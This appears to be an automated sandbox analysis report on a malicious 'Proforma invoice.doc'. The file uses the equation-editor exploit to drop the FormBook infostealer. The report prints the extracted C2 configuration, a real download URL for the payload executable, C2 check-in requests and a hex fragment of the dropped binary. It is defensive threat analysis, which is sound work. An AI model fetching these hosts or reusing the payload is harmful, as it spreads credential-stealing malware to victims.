Windows Analysis Report Proforma invoice.doc

Overview

General Information

Sample Name: Proforma invoice.doc
Analysis ID: 491373
MD5: 5be61511dab1f4f76366f52ca8fec8b1
SHA1: 70a6dd35d6da873242e3c56ff86f000c78614a1f
SHA256: 443ffe0efb43ac5c04e23e749b2908a8e723462f409208e0f4cf35046e3b129d
Tags: doc
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Office equation editor drops PE file
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.handelsbetriebposavec.com/if60/"], "decoy": ["babyjames.space", "dtjug.com", "bhagteri.com", "havplan.com", "gentlesuccess.net", "negativeminus.com", "utesm.com", "ngomen.online", "abohemianeducation.com", "hyper-quote.com", "poseidonflooring.com", "theshopdental.com", "consumelocaloficial.com", "tineue.com", "traerpolio.com", "somnambulantfarms.com", "sugarhillclassiccars.com", "brasseriedufayard.com", "replacerglass.net", "lazyguysmarketing.com", "audiofactaesthetic.com", "14551bercaw.com", "piaamsterdam.com", "coolkidssale.com", "advikaa.com", "suamui.net", "19820907.com", "ankibe.com", "barrelandlens.com", "personowner.guru", "gigexworld.com", "visionandcourage.com", "livelyselfcare.com", "hellohomeowner.com", "bestwazifaforloveback.com", "dyvikapeel.com", "ignitemyboiler.com", "photosbyamandajdaniels.com", "sofuery.com", "rawimage.net", "outtact.com", "tomura-dc.com", "tkachovagv.com", "theheavymental.com", "interfaceprosthetics.com", "publicpod.net", "investotbank.com", "fishguano.com", "livetvchannels.xyz", "trendinggk.com", "adlun.com", "studyhandbook.com", "cardinal.moe", "urbantennis.info", "jsbr.online", "simplyforus.com", "keyleadhealth.com", "aliltasteofnewyork.com", "usdigipro.com", "debbielin.com", "9921.xyz", "watdomenrendi05.com", "asustech.net", "rm-elektrotechnik.gmbh"]}
Multi AV Scanner detection for submitted file
Source: Proforma invoice.doc ReversingLabs: Detection: 26%
Yara detected FormBook
Source: Yara match File source: 5.2.ibefrankhq4862.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.432636146.00000000097DD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.668622476.0000000000390000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.440641863.00000000097DD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.448708427.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.448554657.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.448662852.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.413292643.0000000003881000.00000004.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://fantecheo.tk/ibefrankzx.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankzx[1].exe ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe ReversingLabs: Detection: 13%
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.ibefrankhq4862.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wininit.pdb source: ibefrankhq4862.exe, 00000005.00000002.448740423.0000000000484000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: ibefrankhq4862.exe, wininit.exe

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: fantecheo.tk
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 4x nop then jmp 00A4A358h 4_2_00A4A032
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 4x nop then jmp 00A4A358h 4_2_00A4A2AB
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 4x nop then jmp 00A4A358h 4_2_00A49AC6
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 4x nop then pop ebx 5_2_00407B1A
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 4x nop then pop edi 5_2_00417D85
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 4x nop then pop edi 5_2_00417DBA
Source: C:\Windows\SysWOW64\wininit.exe Code function: 4x nop then pop ebx 7_2_000E7B1C
Source: C:\Windows\SysWOW64\wininit.exe Code function: 4x nop then pop edi 7_2_000F7D85
Source: C:\Windows\SysWOW64\wininit.exe Code function: 4x nop then pop edi 7_2_000F7DBA
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 34.98.99.30:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 34.98.99.30:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 34.98.99.30:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 35.246.6.109:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 35.246.6.109:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 35.246.6.109:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.urbantennis.info
Source: C:\Windows\explorer.exe Network Connect: 34.98.99.30 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.lazyguysmarketing.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.handelsbetriebposavec.com/if60/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDIE-AS-APCloudieLimitedHK CLOUDIE-AS-APCloudieLimitedHK
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /if60/?L0Gd9F=rhh0xc6OYmH3Bp2G4X501Z0vOdzBEjh/MlQjf2DAfTSCIAGZoC8T5uMa8yxQ1kiGUtDxZg==&fDKt=ndxXaN5XDzkTz HTTP/1.1Host: www.lazyguysmarketing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.239.243.112 185.239.243.112
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 12:25:37 GMTContent-Type: application/x-msdownloadContent-Length: 863744Last-Modified: Mon, 27 Sep 2021 01:39:56 GMTConnection: keep-aliveETag: "615120ec-d2e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ae 13 51 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 94 0b 00 00 98 01 00 00 00 00 00 66 b3 0b 00 00 20 00 00 00 c0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 b3 0b 00 4f 00 00 00 00 c0 0b 00 54 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6c 93 0b 00 00 20 00 00 00 94 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 54 94 01 00 00 c0 0b 00 00 96 01 00 00 96 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0d 00 00 02 00 00 00 2c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 b3 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 cc 01 00 14 53 02 00 03 00 00 00 8c 02 00 06 fc 1f 04 00 18 93 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 23 00 00 0a 2a 3a 02 28 24 00 00 0a 02 03 7d 23 00 00 0a 2a 00 13 30 03 00 24 00 00 00 01 00 00 11 03 75 01 00 00 1b 0a 06 2c 18 28 25 00 00 0a 02 7b 23 00 00 0a 06 7b 23 00 00 0a 6f 26 00 00 0a 2b 01 16 2a 76 20 8b e7 6c c3 20 29 55 55 a5 5a 28 25 00 00 0a 02 7b 23 00 00 0a 6f 27 00 00 0a 58 2a 00 00 13 30 07 00 4d 00 00 00 02 00 00 11 14 72 01 00 00 70 17 8d 17 00 00 01 25 16 02 7b 23 00 00 0a 0a 12 00 12 01 fe 15 03 00 00 1b 07 8c 03 00 00 1b 2d 14 71 03 00 00 1b 0b 12 01 07 8c 03 00 00 1b 2d 04 26 14 2b 0b fe 16 03 00 00 1b 6f 28 00 00 0a a2 28 29 00 00 0a 2a 1e 02 7b 2a 00 00 0a 2a 1e 02 7b 2b 00 00 0a 2a 56 02 28 24 00 00 0a 02 03 7d 2a 00 00 0a 02 04 7d 2b 00 00 0a 2a 00 13 30 03 00 3c 00 00 00 03 00 00 11 03 75 04 00 00 1b 0a 06 2c 30 28 25 00 00 0a 02 7b 2a 00 00 0a 06 7b 2a 00 00 0a 6f 26 00 00 0a 2c 18 28 2c 00 00 0a 02 7b 2b 00 00 0a 06 7b 2b 00 00 0a 6f 2d 00 00 0a 2b 01 16 2a d2 20 b6 70 69 7c 20 29 55 55 a5 5a 28 25 00 00 0a 02
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /ibefrankzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: fantecheo.tkConnection: Keep-Alive
Source: explorer.exe, 00000006.00000000.416645751.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000006.00000000.430241392.00000000083E7000.00000004.00000001.sdmp String found in binary or memory: Http://www.msn.com/de-de/?ocid=iehp
Source: explorer.exe, 00000006.00000000.427412095.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.416645751.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.416645751.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.489109171.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.424935061.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.424935061.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.434104631.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.436720944.0000000003E50000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.424935061.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.430241392.00000000083E7000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.418800523.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.430241392.00000000083E7000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.427412095.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.427412095.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.424935061.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.434104631.0000000001BE0000.00000002.00020000.sdmp, wininit.exe, 00000007.00000002.668831534.0000000001F00000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.489109171.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000006.00000000.427412095.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.416645751.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.424935061.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.427412095.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.430241392.00000000083E7000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp=0
Source: explorer.exe, 00000006.00000000.430241392.00000000083E7000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehpLh-
Source: explorer.exe, 00000006.00000000.430241392.00000000083E7000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: explorer.exe, 00000006.00000000.416645751.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.418800523.00000000045D6000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.418800523.00000000045D6000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: ibefrankhq4862.exe, ibefrankhq4862.exe, 00000005.00000002.449302089.00000000013A2000.00000020.00020000.sdmp, wininit.exe, 00000007.00000002.668531899.00000000002B0000.00000004.00000001.sdmp String found in binary or memory: http://www.rspb.org.uk/wildlife/birdguide/name/
Source: explorer.exe, 00000006.00000000.416645751.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.492146934.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.425752523.0000000003D90000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: explorer.exe, 00000006.00000000.430241392.00000000083E7000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: explorer.exe, 00000006.00000000.418800523.00000000045D6000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
Source: explorer.exe, 00000006.00000000.489109171.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.489109171.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.489109171.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D3778CDA-961A-4F4E-A09E-6641E3AF482B}.tmp Jump to behavior
Source: unknown DNS traffic detected: queries for: fantecheo.tk
Source: global traffic HTTP traffic detected: GET /ibefrankzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: fantecheo.tkConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /if60/?L0Gd9F=rhh0xc6OYmH3Bp2G4X501Z0vOdzBEjh/MlQjf2DAfTSCIAGZoC8T5uMa8yxQ1kiGUtDxZg==&fDKt=ndxXaN5XDzkTz HTTP/1.1Host: www.lazyguysmarketing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 5.2.ibefrankhq4862.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.432636146.00000000097DD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.668622476.0000000000390000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.440641863.00000000097DD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.448708427.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.448554657.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.448662852.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.413292643.0000000003881000.00000004.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 5.2.ibefrankhq4862.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.ibefrankhq4862.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.432636146.00000000097DD000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.432636146.00000000097DD000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.668622476.0000000000390000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.668622476.0000000000390000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.440641863.00000000097DD000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.440641863.00000000097DD000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.448708427.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.448708427.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.448554657.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.448554657.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.448662852.0000000000380000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.448662852.0000000000380000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.413292643.0000000003881000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.413292643.0000000003881000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankzx[1].exe Jump to dropped file
.NET source code contains very large strings
Source: ibefrankzx[1].exe.2.dr, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Source: ibefrankhq4862.exe.2.dr, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Source: 4.0.ibefrankhq4862.exe.13a0000.0.unpack, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Source: 4.2.ibefrankhq4862.exe.13a0000.2.unpack, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Source: 5.0.ibefrankhq4862.exe.13a0000.0.unpack, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Source: 5.2.ibefrankhq4862.exe.13a0000.5.unpack, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Yara signature match
Source: 5.2.ibefrankhq4862.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.ibefrankhq4862.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.432636146.00000000097DD000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
